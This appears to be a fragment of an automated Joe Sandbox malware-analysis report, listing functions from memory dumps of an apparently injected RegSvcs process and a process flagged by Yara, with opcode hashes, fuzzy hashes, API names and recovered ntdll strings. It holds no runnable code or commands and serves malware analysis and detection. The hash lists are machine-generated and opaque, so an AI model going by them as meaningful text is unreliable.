                                                        • Opcode ID: 1231409672633bad49d99cf2f40b17d77fc89a88f9bf3400a69ebf489560df92
                                                        • Instruction ID: a901aed293fe2a659cac93e5bd6c7e83ad9e6a0b9f716e08aaf47a5c2e3e58eb
                                                        • Opcode Fuzzy Hash: 1231409672633bad49d99cf2f40b17d77fc89a88f9bf3400a69ebf489560df92
                                                        • Instruction Fuzzy Hash: C201B532E486585BD72CBA2879087862A95B7C9B3CF15407EFA18AF288D7604CC1DB94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID:
                                                        • API String ID: 48624451-0
                                                        • Opcode ID: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                        • Instruction ID: c4091470a68c1f0be83a02b88911ea8224b695ea767a7f823b6cc0dc5904f190
                                                        • Opcode Fuzzy Hash: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                        • Instruction Fuzzy Hash: 1451D7B5A00217BFDB29DB9CD89097EFBB8BF086407148229F5A5D7641E374DE408BA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        • SsHd, xrefs: 0111A3E4
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 011679D0, 011679F5
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011679D5
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011679FA
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                        • API String ID: 0-929470617
                                                        • Opcode ID: f753e07add7be5a6bd2e015251e86eceea13e22c1af92278ae7d9530a22fa475
                                                        • Instruction ID: 8d1b1abba131bd8429c0c47bc766ab3b2362b55fe67c61f53a62b6bca02e0a30
                                                        • Opcode Fuzzy Hash: f753e07add7be5a6bd2e015251e86eceea13e22c1af92278ae7d9530a22fa475
                                                        • Instruction Fuzzy Hash: C8E104306093818FD72DCE28D484B6AFFE4AF84228F094A3DE955CB295E731D944CB42

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 01169341, 01169366
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01169346
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0116936B
                                                        • GsHd, xrefs: 0111D874
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                        • API String ID: 3446177414-576511823
                                                        • Opcode ID: 7b99f28050b7d8146f45945b4c96229eccdcd3d2a9bdce6cc70eab8a979eee5f
                                                        • Instruction ID: 6cbcf112cb736291d995ec77b1da4d299fbf80b67a0b1ccff74597543df4d519
                                                        • Opcode Fuzzy Hash: 7b99f28050b7d8146f45945b4c96229eccdcd3d2a9bdce6cc70eab8a979eee5f
                                                        • Instruction Fuzzy Hash: 7EE1C4706083468FDB2CCF68D484B6AFBE5BF88318F044A3DE9958B285D771E954CB52

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                        • Instruction ID: fe0ebba4acb43aaa116725e86e7d04ba91347b08e6552120f6dc7bc0496cecd2
                                                        • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                        • Instruction Fuzzy Hash: 0B818D70A0924A9FEF2DCF6CC8917FEBBA2AF45B20F184159D861A72D1C734D8418B59

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$@
                                                        • API String ID: 3446177414-1194432280
                                                        • Opcode ID: 7857a4d9a05aeee1d7e5921168d8bb6892a0d445905bb023307080d226ad3201
                                                        • Instruction ID: c9399d2679ce112a74a29f8e0e64d0fc4f759bd6c6f3e3b400b29f60060ddb17
                                                        • Opcode Fuzzy Hash: 7857a4d9a05aeee1d7e5921168d8bb6892a0d445905bb023307080d226ad3201
                                                        • Instruction Fuzzy Hash: 65811B71D012699BDB399B54CC54BEAB6B8AF08754F0041EAEA1DB7280D7715E84CFA0

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 0112D959
                                                          • Part of subcall function 01104859: RtlDebugPrintTimes.NTDLL ref: 011048F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$$p.$)
                                                        • API String ID: 3446177414-2596435465
                                                        • Opcode ID: b4890f9117b7d28719ee1b787cb973ddb074a3bc4e78d64bd9a22ebbd2bfe32a
                                                        • Instruction ID: ec585fc85c68fac041a585cba6caaf5bd997039a947c7c004ab34c69bfefcf2d
                                                        • Opcode Fuzzy Hash: b4890f9117b7d28719ee1b787cb973ddb074a3bc4e78d64bd9a22ebbd2bfe32a
                                                        • Instruction Fuzzy Hash: E9510F71A0435A9FDF2CDFE8E48479DBBB2BF44318F24416DD9156B285D7B0A892CB80

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0ITw$0ITw$0ITw$X
                                                        • API String ID: 3446177414-1798417830
                                                        • Opcode ID: 71182e2a9657671b0fcc236ff2d53649e03f23556e4d6400a8b694877fc2100a
                                                        • Instruction ID: cd7a8a981b73b6f8dd579c039fa2f994c8abdb067175918751aabf0d9130e991
                                                        • Opcode Fuzzy Hash: 71182e2a9657671b0fcc236ff2d53649e03f23556e4d6400a8b694877fc2100a
                                                        • Instruction Fuzzy Hash: D331C03190424EEBCF2AEF98D800B8D3BB1BBC8B58F11402DFD5996255D3709A91CF96

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                        • API String ID: 3446177414-56086060
                                                        • Opcode ID: 8d28f74a5c834e372b4e49381dd0531bf8b676fbe3a79025a0f64a85872a8e2e
                                                        • Instruction ID: 25d0747e3b0ccbe4d43c2cd09dfb68905fb237766b63bc219d9c048fb3fd7b4b
                                                        • Opcode Fuzzy Hash: 8d28f74a5c834e372b4e49381dd0531bf8b676fbe3a79025a0f64a85872a8e2e
                                                        • Instruction Fuzzy Hash: C6418831600752DFDB2EDF68D4A5BAAB7B8FF01724F14806CE5418B691CB74AC91CB81
                                                        APIs
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01184888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01184899
                                                        • LdrpCheckRedirection, xrefs: 0118488F
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 3446177414-3154609507
                                                        • Opcode ID: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                        • Instruction ID: 74012c8be688fefa2d488a450d4e54f52d06889da090507e874c0b468b35d214
                                                        • Opcode Fuzzy Hash: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                        • Instruction Fuzzy Hash: 7841C6326147529BCB29FF9CD440B267BE4BF4A650F06856DED9497B15EB30D800CF91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                        • API String ID: 3446177414-3526935505
                                                        • Opcode ID: c57da471502973807a3c60ec2974f15e53e3d835a1540fe594268519f0e73018
                                                        • Instruction ID: 24695564dab26957a375cb2e4159f30af33bd6e7f7acc38737e552c20a686e33
                                                        • Opcode Fuzzy Hash: c57da471502973807a3c60ec2974f15e53e3d835a1540fe594268519f0e73018
                                                        • Instruction Fuzzy Hash: 89317D31104B95DFDB2EDB6CD819B9677E8FF02714F05405DE4828BA91CBB9A891CB11
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $
                                                        • API String ID: 3446177414-3993045852
                                                        • Opcode ID: c1c81f73f1b74ec54622b80c8d00a5a063f586c6e106d870f42347d5f714c1b6
                                                        • Instruction ID: 2edc7b416e8669da6aeead17daee21845d0bd54e4b954f545efda7532296a1bf
                                                        • Opcode Fuzzy Hash: c1c81f73f1b74ec54622b80c8d00a5a063f586c6e106d870f42347d5f714c1b6
                                                        • Instruction Fuzzy Hash: 05110C32904218EFCF19AFA4E84869D7B72FF44765F108529FD26672D0CB716A41CF54
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f55d00bed9fdcef21a983f3e75b8b46c4ba17c244cfce35d825bf685a6999643
                                                        • Instruction ID: b65e67d4e01981d188919ba8b96fa623a7d78f77984f582d99ac1ab02094c7ad
                                                        • Opcode Fuzzy Hash: f55d00bed9fdcef21a983f3e75b8b46c4ba17c244cfce35d825bf685a6999643
                                                        • Instruction Fuzzy Hash: 19E11F71D00629DFCB29CFA9C980A9DFBF1FF49314F24452AE556A7261D730A852CF11
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: ce41bde982a80e2894d634b0bd7938c92715c5cdfbd078d382cb868e5c94b8f0
                                                        • Instruction ID: 0d6193c0c96996733e20bebf8356c3d61237dfc56267d05e120fe528c6bc3d55
                                                        • Opcode Fuzzy Hash: ce41bde982a80e2894d634b0bd7938c92715c5cdfbd078d382cb868e5c94b8f0
                                                        • Instruction Fuzzy Hash: 57714571E0021A9FDF09CFA8D984ADEBBF5BF48314F14402AE915EB350D734A906CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 07cda1adedc3a3f958fb819d453709a6a296f6c8e6f5b7cdd1c142f7ebf99d2a
                                                        • Instruction ID: f692fc233aec022ca1b9ecfe944c3e30cfa6f3a8437faa206a4d77aa68c7f74e
                                                        • Opcode Fuzzy Hash: 07cda1adedc3a3f958fb819d453709a6a296f6c8e6f5b7cdd1c142f7ebf99d2a
                                                        • Instruction Fuzzy Hash: 10511375E0421A9FDF08CF98D845ADEBBB1BF48314F15812AE925A7390D734A942CF64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                        • String ID:
                                                        • API String ID: 4281723722-0
                                                        • Opcode ID: 6729422eafa4442c790b53e5d3595c5d35e3de16b7f5af9360fd74176fd21deb
                                                        • Instruction ID: 069fb1a4545a91878cffba6bad8d2ca5981ebfdf0e7d1f6b175e42d22fcdaa41
                                                        • Opcode Fuzzy Hash: 6729422eafa4442c790b53e5d3595c5d35e3de16b7f5af9360fd74176fd21deb
                                                        • Instruction Fuzzy Hash: 36310571E002299FCF29EFA8E885AADBBF1FB48724F10412AE522B7394D7355941CF54
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 636a5734ebd0cf1656aac0b896776623679a987c25c8a7d765075a6820b96762
                                                        • Instruction ID: 8cf0342c099c332765b66e06ad009e92924325a21170173d20361067ba9992fd
                                                        • Opcode Fuzzy Hash: 636a5734ebd0cf1656aac0b896776623679a987c25c8a7d765075a6820b96762
                                                        • Instruction Fuzzy Hash: 77327970D0426ADFDB6ACF68C944BEDBBB5BF08308F0081E9D549A7281D7B55A84CF91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                        • Instruction ID: a172ee15651aae1b94f5dacac1068885d9bb1ee67feb9a303e9c2a5ec14952c4
                                                        • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                        • Instruction Fuzzy Hash: 9491B171E002169BEF2CDF6DC890ABEBBA5FF44B20F54461AE965E72C0D73099418B52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Bl$l
                                                        • API String ID: 3446177414-208461968
                                                        • Opcode ID: b10eebdc626e7746114fd068226ae78d6ffd321349990971e3ee2741e0a62ac4
                                                        • Instruction ID: 5a11af650ddd1affc53f700af0b9a3473de21300935a5fab20373dba16ada4c9
                                                        • Opcode Fuzzy Hash: b10eebdc626e7746114fd068226ae78d6ffd321349990971e3ee2741e0a62ac4
                                                        • Instruction Fuzzy Hash: C5A1C271A043298BEF3DDB98D888BADF7A1AB44304F0540F9D90967649DB34AE85CF52
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 01145E34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: aab681df7933971758d100d30455cb0f3408d4f116338b0e886858d2380cf3fa
                                                        • Instruction ID: ee47a541df71e68b2ed4cf0f05915a4c43387006e6884d67fab37c4dcb0e0a31
                                                        • Opcode Fuzzy Hash: aab681df7933971758d100d30455cb0f3408d4f116338b0e886858d2380cf3fa
                                                        • Instruction Fuzzy Hash: FF518B7190C20697DB6DB62CD90136E7FA5EB40F10F10CD68E4E687299EB35C4D5874B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: b9d63051fb26a3ffc6a32e3d1b76b28ebc949b13238aa9eeb5483776031ac69f
                                                        • Instruction ID: fd735df6cee7ce829278b98b7d8e45522b0c246403f0d4fdd9d4bf16394d3796
                                                        • Opcode Fuzzy Hash: b9d63051fb26a3ffc6a32e3d1b76b28ebc949b13238aa9eeb5483776031ac69f
                                                        • Instruction Fuzzy Hash: 53518CB1E00208CBDF2ACF99C4886ADFBF4FF94758F15806ED0599B659E7709985CB80
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0118CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4_w@4_w
                                                        • API String ID: 4062629308-713214301
                                                        • Opcode ID: 2d9f8c87b6c3f7880e0b81e5600213041fcbcbf2873fd7cfeb49720a5799158e
                                                        • Instruction ID: bde9166e94ce92d89b954fd46cb52400de73dfb2cd5314d9a2e15255a1034774
                                                        • Opcode Fuzzy Hash: 2d9f8c87b6c3f7880e0b81e5600213041fcbcbf2873fd7cfeb49720a5799158e
                                                        • Instruction Fuzzy Hash: 2841A371900215DFDB29AF99D840AADFBB4FF55B14F10812EE915EB254D730D841CF61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $
                                                        • API String ID: 3446177414-3993045852
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-235565663
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction ID: 4c6c76dc4b032d1496107575136cf41150f9ae3be6f93c10328935d15d37891e
                                                        • Opcode Fuzzy Hash: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction Fuzzy Hash: 51E06D766002057BCA10EE59DC41EDB33ADDFC9710F004418FA08A7241D670B81086B4
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 921b030c230440de0726696820ca5261c4a634c9c5d71502a68629f0eb4e272c
